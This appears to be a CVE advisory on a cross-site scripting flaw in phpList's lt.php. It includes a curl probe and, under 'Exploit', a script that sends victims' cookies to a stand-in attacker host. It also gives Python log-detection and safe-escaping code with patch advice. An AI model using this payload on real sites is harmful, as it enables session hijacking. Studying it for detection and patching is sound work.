How the CVE Works
CVE-2025-28074 affects phpList versions before 3.6.15. The flaw lies in `lt.php`, which does not properly sanitize user-supplied input before using it in dynamically generated paths and the response built from them. An attacker who controls that input can inject JavaScript, giving reflected or stored XSS: the script runs in the victim's browser under the victim's session with the application, and can be used to hijack that session, deface the page, or steal sensitive data.
DailyCVE Form
Platform: phpList
Version: < 3.6.15
Vulnerability: XSS
Severity: Medium
Date: 06/16/2025
Prediction: Patch by 07/15/2025
What Undercode Say
Analytics
# locate the affected script under the web root
grep -r "lt.php" /var/www/phplist
# probe the endpoint with a harmless marker payload (the advisory does not name the real parameter)
curl -X POST -d "payload=<script>alert(1)</script>" http://target/lt.php
Exploit
<script>document.location='http://attacker/steal.php?cookie='+document.cookie</script>
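A way to check web-server logs for attempts like the one above, as an added example rather than anything from the advisory or the phpList project: the Python below parses Apache combined-format access-log lines (constructed here, including a URL-encoded copy of the cookie-stealing payload and a double-encoded variant), URL-decodes the query string of requests to `lt.php` until it stops changing, and flags script tags, event handlers and `javascript:` URLs. The script name, log format and indicator list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real phpList traffic).
# Line 2 carries the URL-encoded cookie-stealing payload; line 3 is double-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jun/2025:10:01:02 +0000] "GET /lists/lt.php?tid=abc123 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Jun/2025:10:01:07 +0000] "GET /lists/lt.php?tid=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker%2Fsteal.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.9 - - [16/Jun/2025:10:01:09 +0000] "GET /lists/lt.php?tid=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.2 - - [16/Jun/2025:10:02:00 +0000] "GET /lists/index.php?p=subscribe HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "method target protocol" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators of injected markup once the query string is decoded (assumed list, extend as needed).
XSS_INDICATORS = re.compile(
    r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:img|svg|iframe|body|object|embed)\b",
    re.IGNORECASE,
)


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) are caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_attempts(log_text, script_name="lt.php"):
    """Return one record per request to script_name whose decoded query matches an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if path.rsplit("/", 1)[-1] != script_name:
            continue
        decoded = fully_decode(query)
        indicator = XSS_INDICATORS.search(decoded)
        if indicator:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "indicator": indicator.group(0),
                "decoded_query": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} "
              f"matched {hit['indicator']!r}: {hit['decoded_query']}")
```

Run against a real log with `find_xss_attempts(open("/var/log/apache2/access.log").read())`; a 200 response to a request whose decoded query carries a script tag is the signal that the reflection actually happened, while a 302 suggests the tracker redirected without rendering the input.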
Protection from this CVE
Update to phpList 3.6.15 or later
Encode user-supplied values before `lt.php` echoes them (HTML-escape text and attribute values; validate anything used as a URL or path)
Add a Content-Security-Policy header that disallows inline scripts, as defense in depth
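To make the encoding advice concrete, here is an added Python model of the bug class described under "How the CVE Works" and of its fix; it is not phpList's code, and the parameter names (`tid`, `target`), the page layout and the header values are assumptions. `render_vulnerable` pastes request parameters straight into HTML; `render_safe` HTML-encodes them and only lets an absolute http(s) URL become an `href`; the checks at the bottom push the payload from the Exploit section, an attribute breakout and a `javascript:` URL through both renderers.

```python
import html
from urllib.parse import urlsplit

# Constructed inputs. SCRIPT_PAYLOAD is the cookie-stealer from the Exploit section;
# the other two show that text-context escaping alone is not enough for href values.
BENIGN_ID = "abc123"
SCRIPT_PAYLOAD = "<script>document.location='http://attacker/steal.php?cookie='+document.cookie</script>"
ATTR_BREAKOUT = '" onmouseover="alert(1)'
JS_URL = "javascript:alert(document.cookie)"

# Assumed response headers; a CSP without 'unsafe-inline' stops an injected <script>
# from executing even if encoding is missed somewhere.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}


def render_vulnerable(tid, target):
    """The bug class: request parameters concatenated into HTML with no encoding."""
    return (f"<p>Tracking id: {tid}</p>\n"
            f'<a href="{target}">continue</a>')


def safe_url(target):
    """Only absolute http(s) URLs may become an href; javascript:, data: and attribute
    breakouts have no usable scheme/host and fall back to '/'."""
    parts = urlsplit(target)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return target
    return "/"


def render_safe(tid, target):
    """Context-aware output: HTML-encode text and attribute values (quote=True also
    encodes quotes), and validate the URL before encoding it into the attribute."""
    return (f"<p>Tracking id: {html.escape(tid, quote=True)}</p>\n"
            f'<a href="{html.escape(safe_url(target), quote=True)}">continue</a>')


def contains_active_content(page):
    """Crude check used here to compare both renderers: does the markup still carry
    a script tag, a javascript: href or the injected event handler?"""
    lowered = page.lower()
    return ("<script" in lowered
            or 'href="javascript:' in lowered
            or " onmouseover=" in lowered)


if __name__ == "__main__":
    for tid, target in ((SCRIPT_PAYLOAD, "http://example.org/"),
                        (BENIGN_ID, ATTR_BREAKOUT),
                        (BENIGN_ID, JS_URL)):
        print("vulnerable:", contains_active_content(render_vulnerable(tid, target)),
              "| safe:", contains_active_content(render_safe(tid, target)))
    for name, value in SECURITY_HEADERS.items():
        print(f"{name}: {value}")
```

The two-step handling of `target` is the point: HTML-escaping a `javascript:` URL leaves it a working `javascript:` URL, so values that end up in a path or href need scheme validation before they are encoded for the attribute context, and the CSP is there for the case where some other echo is missed.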
Impact
Session hijacking
Data theft
UI manipulation
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode